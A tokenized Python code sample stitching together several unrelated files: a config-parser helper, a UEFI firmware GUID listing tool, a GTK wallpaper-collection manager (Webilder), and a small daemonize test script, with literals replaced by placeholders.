'<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import os <EOL> from ConfigParser import SafeConfigParser , NoOptionError <EOL> def abs_path ( path ) : <EOL> path = os . path . expanduser ( path ) <EOL> path = os . path . abspath ( path ) <EOL> return path <EOL> def config_option ( fn , section , option ) : <EOL> try : <EOL> return fn ( section , option ) <EOL> except NoOptionError : <EOL> return None <EOL> def config_parser ( path ) : <EOL> path = abs_path ( path ) <EOL> config = SafeConfigParser ( ) <EOL> with open ( path ) as fp : <EOL> config . readfp ( fp ) <EOL> return config </s>
<s> import argparse <EOL> from uefi_firmware . uefi import * <EOL> from uefi_firmware . utils import * <EOL> from uefi_firmware . flash import FlashDescriptor <EOL> from uefi_firmware . guids import get_guid_name <EOL> def debug ( text , cr = True , gen = False ) : <EOL> if args . generate is not None and not gen : <EOL> return <EOL> if args . generate is None and gen : <EOL> return <EOL> elif cr : <EOL> print text <EOL> else : <EOL> print text , <EOL> def label_as_guid_name ( label ) : <EOL> if args . generate is None : <EOL> return None <EOL> def is_cap ( c ) : <EOL> if ord ( c ) >= ord ( '<STR_LIT:A>' ) and ord ( c ) <= ord ( '<STR_LIT>' ) : <EOL> return True <EOL> return False <EOL> producer = "<STR_LIT>" <EOL> for i in xrange ( len ( label ) ) : <EOL> if label [ i ] == '<STR_LIT:_>' : <EOL> continue <EOL> if i > <NUM_LIT:0> : <EOL> if is_cap ( label [ i ] ) and not is_cap ( label [ i - <NUM_LIT:1> ] ) : <EOL> producer += "<STR_LIT:_>" <EOL> producer += label [ i ] <EOL> if len ( producer ) == <NUM_LIT:0> : <EOL> return None <EOL> if producer . lower ( ) . find ( args . generate . lower ( ) ) != <NUM_LIT:0> : <EOL> producer = "<STR_LIT>" % ( args . generate , producer ) <EOL> return "<STR_LIT>" % producer . upper ( ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def list_uefi_guids ( base_object ) : <EOL> base_objects = base_object . iterate_objects ( False ) <EOL> objects = flatten_firmware_objects ( base_objects ) <EOL> guids = { } <EOL> for firmware_object in objects : <EOL> guid = firmware_object [ "<STR_LIT>" ] if "<STR_LIT>" in firmware_object else None <EOL> if guid is None : <EOL> continue <EOL> if firmware_object [ "<STR_LIT>" ] in [ v for k , v in FIRMWARE_GUIDED_GUIDS . iteritems ( ) ] : <EOL> guid = firmware_object [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> if len ( guid ) == <NUM_LIT:0> : <EOL> continue <EOL> if guid not in guids . 
keys ( ) : <EOL> guids [ guid ] = { "<STR_LIT>" : [ ] , "<STR_LIT>" : [ ] } <EOL> if len ( firmware_object [ "<STR_LIT:label>" ] ) > <NUM_LIT:0> and firmware_object [ "<STR_LIT:label>" ] not in guids [ guid ] [ "<STR_LIT>" ] : <EOL> guids [ guid ] [ "<STR_LIT>" ] . append ( firmware_object [ "<STR_LIT:label>" ] ) <EOL> if firmware_object [ "<STR_LIT:type>" ] not in guids [ guid ] [ "<STR_LIT>" ] : <EOL> guids [ guid ] [ "<STR_LIT>" ] . append ( firmware_object [ "<STR_LIT:type>" ] ) <EOL> guid_list = guids . keys ( ) <EOL> guid_list . sort ( ) <EOL> for guid in guid_list : <EOL> guid_name = get_guid_name ( s2aguid ( guid ) ) <EOL> label = "<STR_LIT>" <EOL> if len ( guids [ guid ] [ "<STR_LIT>" ] ) >= <NUM_LIT:1> : <EOL> label = guids [ guid ] [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> if guid_name is not None : <EOL> debug ( guid_name , False ) <EOL> else : <EOL> debug ( "<STR_LIT>" , False ) <EOL> generated_label = label_as_guid_name ( label ) <EOL> if generated_label is not None or args . unknowns : <EOL> if args . unknowns and generated_label is None : <EOL> generated_label = "<STR_LIT>" <EOL> debug ( "<STR_LIT>" % <EOL> ( generated_label , s2aguid ( guid ) ) , True , True ) <EOL> debug ( green ( guid ) , False ) <EOL> debug ( "<STR_LIT:U+002CU+0020>" . join ( [ purple ( _label ) <EOL> for _label in guids [ guid ] [ "<STR_LIT>" ] ] ) , False ) <EOL> debug ( "<STR_LIT:U+002CU+0020>" . 
join ( [ blue ( guid_type ) <EOL> for guid_type in guids [ guid ] [ "<STR_LIT>" ] ] ) ) <EOL> pass <EOL> def brute_search_volumes ( data ) : <EOL> volumes = search_firmware_volumes ( data ) <EOL> for index in volumes : <EOL> parse_firmware_volume ( data [ index - <NUM_LIT> : ] , name = index - <NUM_LIT> ) <EOL> pass <EOL> def brute_search_flash ( data ) : <EOL> descriptors = search_flash_descriptor ( data ) <EOL> for index in descriptors : <EOL> parse_flash_descriptor ( data [ index : ] ) <EOL> pass <EOL> def parse_firmware_capsule ( data , name = <NUM_LIT:0> ) : <EOL> firmware_capsule = FirmwareCapsule ( data , name ) <EOL> if not firmware_capsule . valid_header : <EOL> return <EOL> firmware_capsule . process ( ) <EOL> pass <EOL> def parse_firmware_volume ( data , name = <NUM_LIT:0> ) : <EOL> firmware_volume = FirmwareVolume ( data , name ) <EOL> firmware_volume . process ( ) <EOL> list_uefi_guids ( firmware_volume ) <EOL> def parse_flash_descriptor ( data ) : <EOL> flash = FlashDescriptor ( data ) <EOL> if not flash . valid_header : <EOL> return <EOL> flash . process ( ) <EOL> list_uefi_guids ( flash ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" ) <EOL> parser . add_argument ( <EOL> '<STR_LIT:-c>' , "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , "<STR_LIT>" , default = None , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT:file>" , help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> try : <EOL> with open ( args . 
file , '<STR_LIT:rb>' ) as fh : <EOL> input_data = fh . read ( ) <EOL> except Exception , e : <EOL> print "<STR_LIT>" % ( args . file , str ( e ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args . brute : <EOL> if args . flash : <EOL> brute_search_flash ( input_data ) <EOL> else : <EOL> brute_search_volumes ( input_data ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args . capsule : <EOL> parse_firmware_capsule ( input_data ) <EOL> elif args . flash : <EOL> parse_flash_descriptor ( input_data ) <EOL> else : <EOL> parse_firmware_volume ( input_data ) </s>
<s> '''<STR_LIT>''' <EOL> from webilder import AboutDialog <EOL> from webilder import config_dialog <EOL> from webilder import DownloadDialog <EOL> from webilder import infofile <EOL> from webilder import wbz_handler <EOL> from webilder import WebilderFullscreen <EOL> from webilder . thumbs import ThumbLoader <EOL> from webilder . uitricks import UITricks , open_browser <EOL> import sys , os , time , glob , gc <EOL> import optparse <EOL> import gtk , gobject <EOL> import pkg_resources <EOL> try : <EOL> import gnomevfs <EOL> except ImportError : <EOL> gnomevfs = None <EOL> from webilder . config import config , set_wallpaper , reload_config <EOL> IV_TEXT_COLUMN = <NUM_LIT:0> <EOL> IV_PIXBUF_COLUMN = <NUM_LIT:1> <EOL> IV_DATA_COLUMN = <NUM_LIT:2> <EOL> TV_TEXT_COLUMN = <NUM_LIT:0> <EOL> TV_PATH_COLUMN = <NUM_LIT:1> <EOL> TV_KIND_COLUMN = <NUM_LIT:2> <EOL> TV_KIND_DIR = "<STR_LIT>" <EOL> TV_KIND_RECENT = "<STR_LIT>" <EOL> EMPTY_PICTURE = gtk . gdk . pixbuf_new_from_file_at_size ( <EOL> pkg_resources . resource_filename ( __name__ , '<STR_LIT>' ) , <NUM_LIT> , <NUM_LIT> ) <EOL> def connect_to_menu ( wtree , item , callback ) : <EOL> """<STR_LIT>""" <EOL> wtree . get_widget ( item ) . connect ( '<STR_LIT>' , callback ) <EOL> class WebilderDesktopWindow ( UITricks ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> UITricks . __init__ ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . sort_combo . set_active ( <NUM_LIT:1> ) <EOL> renderer = gtk . CellRendererText ( ) <EOL> self . tree . append_column ( <EOL> column = gtk . TreeViewColumn ( "<STR_LIT>" , renderer , markup = <NUM_LIT:0> ) ) <EOL> self . tree . columns_autosize ( ) <EOL> self . load_collection_tree ( config . get ( '<STR_LIT>' ) ) <EOL> self . iconview . set_pixbuf_column ( IV_PIXBUF_COLUMN ) <EOL> self . iconview . set_markup_column ( IV_TEXT_COLUMN ) <EOL> self . on_iconview_handle_selection_changed ( self . iconview ) <EOL> self . 
collection_monitor = dict ( monitor = None , dir = None ) <EOL> self . image_popup = ImagePopup ( self ) <EOL> self . download_dialog = None <EOL> if gnomevfs : <EOL> self . tree_monitor = gnomevfs . monitor_add ( <EOL> config . get ( '<STR_LIT>' ) , <EOL> gnomevfs . MONITOR_DIRECTORY , <EOL> self . collection_tree_changed ) <EOL> self . restore_window_state ( ) <EOL> self . top_widget . show_all ( ) <EOL> self . hand_cursor = gtk . gdk . Cursor ( gtk . gdk . HAND2 ) <EOL> def load_collection_tree ( self , root ) : <EOL> """<STR_LIT>""" <EOL> model = gtk . TreeStore ( gobject . TYPE_STRING , gobject . TYPE_STRING , <EOL> gobject . TYPE_STRING ) <EOL> model . append ( None , ( _ ( '<STR_LIT>' ) , '<STR_LIT>' , TV_KIND_RECENT ) ) <EOL> dirlist = os . listdir ( root ) <EOL> for entry in sorted ( dirlist ) : <EOL> fullpath = os . path . join ( root , entry ) <EOL> entry = html_escape ( entry ) <EOL> if os . path . isdir ( fullpath ) : <EOL> model . append ( None , ( entry , fullpath , TV_KIND_DIR ) ) <EOL> self . tree . set_model ( model ) <EOL> def on_tree_handle_selection_changed ( self , tree_selection ) : <EOL> """<STR_LIT>""" <EOL> if not tree_selection : <EOL> return <EOL> model , selection = tree_selection . get_selected_rows ( ) <EOL> for path in selection : <EOL> iterator = model . get_iter ( path ) <EOL> rootdir = self . tree . get_model ( ) . get_value ( iterator , TV_PATH_COLUMN ) <EOL> kind = self . tree . get_model ( ) . get_value ( iterator , TV_KIND_COLUMN ) <EOL> if kind == TV_KIND_DIR : <EOL> self . load_directory_collection ( rootdir ) <EOL> else : <EOL> self . load_recent_photos ( ) <EOL> def load_directory_collection ( self , dirname ) : <EOL> """<STR_LIT>""" <EOL> images = glob . glob ( os . path . join ( dirname , '<STR_LIT>' ) ) <EOL> png_images = glob . glob ( os . path . join ( dirname , '<STR_LIT>' ) ) <EOL> images . extend ( png_images ) <EOL> self . 
load_collection ( images , monitor_dir = dirname ) <EOL> def load_recent_photos ( self ) : <EOL> """<STR_LIT>""" <EOL> images = glob . glob ( <EOL> os . path . join ( config . get ( '<STR_LIT>' ) , '<STR_LIT:*>' , '<STR_LIT>' ) ) <EOL> png_images = glob . glob ( <EOL> os . path . join ( config . get ( '<STR_LIT>' ) , '<STR_LIT:*>' , '<STR_LIT>' ) ) <EOL> images . extend ( png_images ) <EOL> recent_time = time . time ( ) - <NUM_LIT> * <NUM_LIT> <EOL> images = [ ( os . path . getmtime ( fname ) , fname ) for fname in images ] <EOL> images = [ pair for pair in images if pair [ <NUM_LIT:0> ] > recent_time ] <EOL> images = [ pair [ <NUM_LIT:1> ] for pair in sorted ( images , reverse = True ) ] <EOL> self . load_collection ( images ) <EOL> def load_collection ( self , images , monitor_dir = None ) : <EOL> """<STR_LIT>""" <EOL> model = gtk . ListStore ( gobject . TYPE_STRING , gtk . gdk . Pixbuf , <EOL> gobject . TYPE_PYOBJECT ) <EOL> image_list = [ ] <EOL> for image in images : <EOL> dirname , filename = os . path . split ( image ) <EOL> basename , ext = os . path . splitext ( filename ) <EOL> thumb = os . path . join ( dirname , <EOL> '<STR_LIT>' , basename + '<STR_LIT>' + ext ) <EOL> info_file = os . path . join ( dirname , basename ) + '<STR_LIT>' <EOL> inf = infofile . parse_info_file ( info_file ) <EOL> title = inf . get ( '<STR_LIT:title>' , basename ) <EOL> album = inf . get ( '<STR_LIT>' , dirname ) <EOL> credit = inf . get ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) <EOL> tags = inf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> title = html_escape ( title ) <EOL> album = html_escape ( album ) <EOL> credit = html_escape ( credit ) <EOL> tags = html_escape ( tags ) <EOL> data = dict ( title = title , <EOL> filename = image , <EOL> thumb = thumb , <EOL> inf = inf , <EOL> info_file = info_file , <EOL> album = album , <EOL> tags = tags , <EOL> file_time = os . path . 
getctime ( image ) , <EOL> credit = credit ) <EOL> if len ( title ) > <NUM_LIT> : <EOL> title = title [ : <NUM_LIT> ] + '<STR_LIT>' <EOL> if <NUM_LIT:0> <= time . time ( ) - os . path . getmtime ( image ) < <NUM_LIT> * <NUM_LIT> : <EOL> title = _ ( '<STR_LIT>' ) % title <EOL> position = model . append ( ( title , EMPTY_PICTURE , data ) ) <EOL> image_list . append ( dict ( <EOL> position = position , <EOL> data = data ) ) <EOL> old_model = self . iconview . get_model ( ) <EOL> if old_model is not None : <EOL> old_model . clear ( ) <EOL> self . sort_photos ( model ) <EOL> self . iconview . set_model ( model ) <EOL> gobject . idle_add ( ThumbLoader ( self . iconview , model , <EOL> reversed ( image_list ) ) ) <EOL> self . on_iconview_handle_selection_changed ( self . iconview ) <EOL> if gnomevfs : <EOL> if self . collection_monitor [ '<STR_LIT>' ] is not None : <EOL> gobject . idle_add ( gnomevfs . monitor_cancel , <EOL> self . collection_monitor [ '<STR_LIT>' ] ) <EOL> self . collection_monitor = dict ( monitor = None , dir = None ) <EOL> if monitor_dir : <EOL> self . collection_monitor [ '<STR_LIT>' ] = monitor_dir <EOL> self . collection_monitor [ '<STR_LIT>' ] = gnomevfs . monitor_add ( <EOL> monitor_dir , <EOL> gnomevfs . MONITOR_DIRECTORY , <EOL> self . collection_directory_changed ) <EOL> gc . collect ( ) <EOL> def on_set_as_wallpaper_handle_activate ( self , _menu_item ) : <EOL> """<STR_LIT>""" <EOL> selected = self . iconview . get_selected_items ( ) <EOL> if selected : <EOL> selected = selected [ - <NUM_LIT:1> ] <EOL> if selected : <EOL> self . on_iconview_handle_item_activated ( <EOL> self . iconview , <EOL> selected ) <EOL> def on_iconview_handle_item_activated ( self , icon_view , path ) : <EOL> """<STR_LIT>""" <EOL> iterator = icon_view . get_model ( ) . get_iter ( path ) <EOL> data = icon_view . get_model ( ) . get_value ( iterator , IV_DATA_COLUMN ) <EOL> set_wallpaper ( data [ '<STR_LIT:filename>' ] ) <EOL> gc . 
collect ( ) <EOL> def on_view_fullscreen_handle_activate ( self , _menu_item ) : <EOL> """<STR_LIT>""" <EOL> selected = self . iconview . get_selected_items ( ) <EOL> if selected : <EOL> selected = selected [ - <NUM_LIT:1> ] <EOL> path = selected <EOL> iterator = self . iconview . get_model ( ) . get_iter ( path ) <EOL> data = self . iconview . get_model ( ) . get_value ( iterator , <EOL> IV_DATA_COLUMN ) <EOL> WebilderFullscreen . FullscreenViewer ( self . top_widget , data ) . run ( ) <EOL> gc . collect ( ) <EOL> def on_download_photos_handle_activate ( self , _menu_item ) : <EOL> """<STR_LIT>""" <EOL> def remove_reference ( * _args ) : <EOL> """<STR_LIT>""" <EOL> self . download_dialog = None <EOL> if not self . download_dialog : <EOL> self . download_dialog = DownloadDialog . DownloadProgressDialog ( config ) <EOL> self . download_dialog . top_widget . connect ( '<STR_LIT>' , remove_reference ) <EOL> self . download_dialog . show ( ) <EOL> else : <EOL> self . download_dialog . top_widget . present ( ) <EOL> def on_iconview_handle_selection_changed ( self , icon_view ) : <EOL> """<STR_LIT>""" <EOL> selection = icon_view . get_selected_items ( ) <EOL> if len ( selection ) > <NUM_LIT:0> : <EOL> selection = selection [ - <NUM_LIT:1> ] <EOL> title = album = credit = tags = "<STR_LIT>" <EOL> if selection : <EOL> iterator = icon_view . get_model ( ) . get_iter ( selection ) <EOL> data = icon_view . get_model ( ) . get_value ( iterator , IV_DATA_COLUMN ) <EOL> title = "<STR_LIT>" % data [ '<STR_LIT:title>' ] <EOL> album = data [ '<STR_LIT>' ] <EOL> credit = data [ '<STR_LIT>' ] <EOL> tags = data [ '<STR_LIT>' ] <EOL> self . photo_title . set_markup ( title ) <EOL> self . photo_album . set_markup ( album ) <EOL> self . photo_credit . set_markup ( credit ) <EOL> self . photo_tags . set_markup ( tags ) <EOL> def collection_directory_changed ( self , * _args ) : <EOL> """<STR_LIT>""" <EOL> self . on_tree_handle_selection_changed ( self . tree . 
get_selection ( ) ) <EOL> def on_preferences_handle_activate ( self , _menu_item ) : <EOL> """<STR_LIT>""" <EOL> configure ( ) <EOL> def on_iconview_handle_button_press_event ( self , icon_view , event ) : <EOL> """<STR_LIT>""" <EOL> if event . button == <NUM_LIT:3> : <EOL> xpos , ypos = [ int ( event . x ) , int ( event . y ) ] <EOL> path = icon_view . get_path_at_pos ( xpos , ypos ) <EOL> if not path : <EOL> return <EOL> if not ( event . state & gtk . gdk . CONTROL_MASK ) : <EOL> icon_view . unselect_all ( ) <EOL> icon_view . select_path ( path ) <EOL> self . image_popup . top_widget . popup ( None , None , None , event . button , <EOL> event . time ) <EOL> return False <EOL> def collection_tree_changed ( self , * _args ) : <EOL> """<STR_LIT>""" <EOL> self . load_collection_tree ( config . get ( '<STR_LIT>' ) ) <EOL> def on_quit_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> self . on_WebilderDesktopWindow_handle_delete_event ( None , None ) <EOL> def on_about_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> AboutDialog . show_about_dialog ( '<STR_LIT>' ) <EOL> def on_WebilderDesktopWindow_handle_delete_event ( self , _widget , _event ) : <EOL> """<STR_LIT>""" <EOL> self . save_window_state ( ) <EOL> self . destroy ( ) <EOL> return False <EOL> def save_window_state ( self ) : <EOL> """<STR_LIT>""" <EOL> top = self . top_widget <EOL> layout = { '<STR_LIT>' : top . get_position ( ) , <EOL> '<STR_LIT>' : top . get_size ( ) , <EOL> '<STR_LIT>' : self . hpaned . get_position ( ) , <EOL> '<STR_LIT>' : self . photo_info_expander . get_expanded ( ) , } <EOL> config . set ( '<STR_LIT>' , layout ) <EOL> config . save_config ( ) <EOL> def restore_window_state ( self ) : <EOL> """<STR_LIT>""" <EOL> d = config . get ( '<STR_LIT>' ) <EOL> if d . has_key ( '<STR_LIT>' ) : <EOL> self . top_widget . move ( * d [ '<STR_LIT>' ] ) <EOL> if d . has_key ( '<STR_LIT>' ) : <EOL> self . top_widget . resize ( * d [ '<STR_LIT>' ] ) <EOL> if d . 
has_key ( '<STR_LIT>' ) : <EOL> self . hpaned . set_position ( d [ '<STR_LIT>' ] ) <EOL> if d . has_key ( '<STR_LIT>' ) : <EOL> self . photo_info_expander . set_expanded ( d [ '<STR_LIT>' ] ) <EOL> def on_file_webshots_import_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> dlg = gtk . FileChooserDialog ( <EOL> _ ( '<STR_LIT>' ) , <EOL> None , <EOL> action = gtk . FILE_CHOOSER_ACTION_OPEN , <EOL> buttons = ( _ ( "<STR_LIT>" ) , gtk . RESPONSE_OK , _ ( "<STR_LIT>" ) , <EOL> gtk . RESPONSE_CANCEL ) ) <EOL> dlg . set_select_multiple ( True ) <EOL> try : <EOL> response = dlg . run ( ) <EOL> if response == gtk . RESPONSE_OK : <EOL> files = dlg . get_filenames ( ) <EOL> else : <EOL> files = [ ] <EOL> finally : <EOL> dlg . destroy ( ) <EOL> import_files ( files ) <EOL> def on_donate_handle_activate ( self , _widget ) : <EOL> """<STR_LIT>""" <EOL> donate_dialog = DonateDialog ( ) <EOL> donate_dialog . run ( ) <EOL> donate_dialog . destroy ( ) <EOL> def on_photo_properties_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> selected = self . iconview . get_selected_items ( ) <EOL> if not selected : <EOL> return <EOL> win = UITricks ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> selected = selected [ - <NUM_LIT:1> ] <EOL> path = selected <EOL> iterator = self . iconview . get_model ( ) . get_iter ( path ) <EOL> data = self . iconview . get_model ( ) . get_value ( iterator , <EOL> IV_DATA_COLUMN ) <EOL> win . title . set_markup ( '<STR_LIT>' % data [ '<STR_LIT:title>' ] ) <EOL> win . album . set_markup ( data [ '<STR_LIT>' ] ) <EOL> win . file . set_text ( data [ '<STR_LIT:filename>' ] ) <EOL> win . tags . set_text ( data [ '<STR_LIT>' ] ) <EOL> win . size . set_text ( _ ( '<STR_LIT>' ) % ( os . path . getsize ( data [ '<STR_LIT:filename>' ] ) / <EOL> <NUM_LIT> ) ) <EOL> win . date . set_text ( time . strftime ( '<STR_LIT>' , time . localtime ( os . path . getctime ( <EOL> data [ '<STR_LIT:filename>' ] ) ) ) ) <EOL> win . url . 
set_text ( data [ '<STR_LIT>' ] . get ( '<STR_LIT:url>' , '<STR_LIT>' ) ) <EOL> win . closebutton . connect ( '<STR_LIT>' , lambda * args : win . destroy ( ) ) <EOL> win . show ( ) <EOL> def sort_photos ( self , model ) : <EOL> """<STR_LIT>""" <EOL> if model is None : <EOL> return <EOL> def sort_by_date ( data1 , data2 ) : <EOL> """<STR_LIT>""" <EOL> return - cmp ( data1 [ '<STR_LIT>' ] , data2 [ '<STR_LIT>' ] ) <EOL> def sort_by_title ( data1 , data2 ) : <EOL> """<STR_LIT>""" <EOL> return cmp ( data1 [ '<STR_LIT:title>' ] , data2 [ '<STR_LIT:title>' ] ) <EOL> sort_func = { <NUM_LIT:0> : sort_by_title , <EOL> <NUM_LIT:1> : sort_by_date } [ self . sort_combo . get_active ( ) ] <EOL> model . set_default_sort_func ( lambda m , iter1 , iter2 : <EOL> sort_func ( <EOL> m . get_value ( iter1 , IV_DATA_COLUMN ) , <EOL> m . get_value ( iter2 , IV_DATA_COLUMN ) , <EOL> ) ) <EOL> model . set_sort_column_id ( - <NUM_LIT:1> , gtk . SORT_ASCENDING ) <EOL> del model <EOL> def on_sort_combo_handle_changed ( self , _widget ) : <EOL> """<STR_LIT>""" <EOL> self . sort_photos ( self . iconview . get_model ( ) ) <EOL> def on_delete_handle_activate ( self , _widget ) : <EOL> """<STR_LIT>""" <EOL> delete_files ( self , forever = False ) <EOL> class ImagePopup ( UITricks ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , main_window ) : <EOL> self . main_window = main_window <EOL> self . on_view_full_screen_handle_activate = ( <EOL> main_window . on_view_fullscreen_handle_activate ) <EOL> self . on_set_as_wallpaper_handle_activate = ( <EOL> main_window . on_set_as_wallpaper_handle_activate ) <EOL> self . on_photo_properties_handle_activate = ( <EOL> main_window . on_photo_properties_handle_activate ) <EOL> UITricks . __init__ ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def on_delete_images_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> delete_files ( self . 
main_window , forever = False ) <EOL> def on_delete_forever_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> delete_files ( self . main_window , forever = True ) <EOL> def delete_files ( main_window , forever ) : <EOL> """<STR_LIT>""" <EOL> iconview = main_window . iconview <EOL> selected = iconview . get_selected_items ( ) <EOL> if selected and len ( selected ) > <NUM_LIT:1> : <EOL> if forever : <EOL> message = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> message = _ ( '<STR_LIT>' ) <EOL> dlg = gtk . MessageDialog ( type = gtk . MESSAGE_QUESTION , <EOL> buttons = gtk . BUTTONS_YES_NO , <EOL> message_format = message ) <EOL> response = dlg . run ( ) <EOL> dlg . destroy ( ) <EOL> if response != gtk . RESPONSE_YES : <EOL> return <EOL> banned = open ( os . path . expanduser ( '<STR_LIT>' ) , '<STR_LIT:a>' ) <EOL> model = iconview . get_model ( ) <EOL> monitor = main_window . collection_monitor <EOL> if monitor [ '<STR_LIT>' ] is not None : <EOL> gnomevfs . monitor_cancel ( monitor [ '<STR_LIT>' ] ) <EOL> monitor [ '<STR_LIT>' ] = None <EOL> for path in selected : <EOL> iterator = model . get_iter ( path ) <EOL> data = model . get_value ( iterator , <EOL> IV_DATA_COLUMN ) <EOL> for fname in ( data [ '<STR_LIT:filename>' ] , data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) : <EOL> try : <EOL> os . remove ( fname ) <EOL> except ( IOError , OSError ) : <EOL> pass <EOL> if forever : <EOL> banned . write ( os . path . basename ( data [ '<STR_LIT:filename>' ] ) + '<STR_LIT:\n>' ) <EOL> model . remove ( iterator ) <EOL> if monitor [ '<STR_LIT>' ] : <EOL> monitor [ '<STR_LIT>' ] = gnomevfs . monitor_add ( <EOL> monitor [ '<STR_LIT>' ] , <EOL> gnomevfs . MONITOR_DIRECTORY , <EOL> main_window . collection_directory_changed ) <EOL> banned . 
close ( ) <EOL> HTML_ESCAPE_TABLE = { <EOL> "<STR_LIT:&>" : "<STR_LIT>" , <EOL> '<STR_LIT:">' : "<STR_LIT>" , <EOL> "<STR_LIT:'>" : "<STR_LIT>" , <EOL> "<STR_LIT:>>" : "<STR_LIT>" , <EOL> "<STR_LIT:<>" : "<STR_LIT>" , <EOL> } <EOL> def html_escape ( text ) : <EOL> """<STR_LIT>""" <EOL> output = [ ] <EOL> for char in text : <EOL> output . append ( HTML_ESCAPE_TABLE . get ( char , char ) ) <EOL> return "<STR_LIT>" . join ( output ) <EOL> class DonateDialog ( UITricks ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> UITricks . __init__ ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> text = _ ( '''<STR_LIT>''' ) <EOL> stats = config . get ( '<STR_LIT>' ) <EOL> self . url = '<STR_LIT>' <EOL> context = dict ( <EOL> downloads = stats [ '<STR_LIT>' ] , <EOL> rotations = stats [ '<STR_LIT>' ] , <EOL> inst_date = time . strftime ( '<STR_LIT>' ) , <EOL> url = self . url <EOL> ) <EOL> self . donate_copy . set_markup ( text % context ) <EOL> def run ( self ) : <EOL> val = UITricks . run ( self ) <EOL> if val == <NUM_LIT:0> : <EOL> open_browser ( self . url , no_browser_title = _ ( '<STR_LIT>' ) , <EOL> no_browser_markup = _ ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % self . url ) <EOL> def configure ( ) : <EOL> """<STR_LIT>""" <EOL> reload_config ( ) <EOL> config_dialog . ConfigDialog ( ) . run_dialog ( config ) <EOL> def import_files ( files ) : <EOL> success_count = <NUM_LIT:0> <EOL> for afile in files : <EOL> try : <EOL> success_count += wbz_handler . handle_file ( afile ) <EOL> except ( IOError , KeyError , ValueError ) , e : <EOL> mbox = gtk . MessageDialog ( type = gtk . MESSAGE_ERROR , <EOL> buttons = gtk . BUTTONS_OK ) <EOL> mbox . set_title ( _ ( "<STR_LIT>" ) ) <EOL> mbox . set_markup ( _ ( "<STR_LIT>" ) % ( afile , e ) ) <EOL> mbox . run ( ) <EOL> mbox . destroy ( ) <EOL> if success_count : <EOL> mbox = gtk . MessageDialog ( type = gtk . MESSAGE_INFO , <EOL> buttons = gtk . BUTTONS_OK ) <EOL> mbox . 
set_title ( _ ( "<STR_LIT>" ) ) <EOL> mbox . set_markup ( _ ( "<STR_LIT>" ) <EOL> % success_count ) <EOL> mbox . run ( ) <EOL> mbox . destroy ( ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> parser = optparse . OptionParser ( ) <EOL> parser . add_option ( <EOL> '<STR_LIT>' , dest = "<STR_LIT>" , help = "<STR_LIT>" <EOL> "<STR_LIT>" , action = "<STR_LIT:store_true>" , default = False ) <EOL> parser . add_option ( <EOL> '<STR_LIT>' , dest = "<STR_LIT>" , help = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , default = False ) <EOL> options , args = parser . parse_args ( ) <EOL> gtk . gdk . threads_init ( ) <EOL> if options . configure : <EOL> configure ( ) <EOL> return <EOL> if options . download : <EOL> download_dialog = DownloadDialog . DownloadProgressDialog ( config ) <EOL> main_window = download_dialog <EOL> download_dialog . top_widget . connect ( '<STR_LIT>' , gtk . main_quit ) <EOL> download_dialog . show ( ) <EOL> gtk . main ( ) <EOL> return <EOL> if args : <EOL> import_files ( args ) <EOL> return <EOL> main_window = WebilderDesktopWindow ( ) <EOL> main_window . top_widget . connect ( "<STR_LIT>" , gtk . main_quit ) <EOL> gtk . main ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from sys import argv <EOL> from daemonize import Daemonize <EOL> pid = argv [ <NUM_LIT:1> ] <EOL> working_dir = argv [ <NUM_LIT:2> ] <EOL> file_name = argv [ <NUM_LIT:3> ] <EOL> def main ( ) : <EOL> with open ( file_name , "<STR_LIT:w>" ) as f : <EOL> f . write ( "<STR_LIT:test>" ) <EOL> daemon = Daemonize ( app = "<STR_LIT>" , pid = pid , action = main , chdir = working_dir ) <EOL> daemon . start ( ) </s>
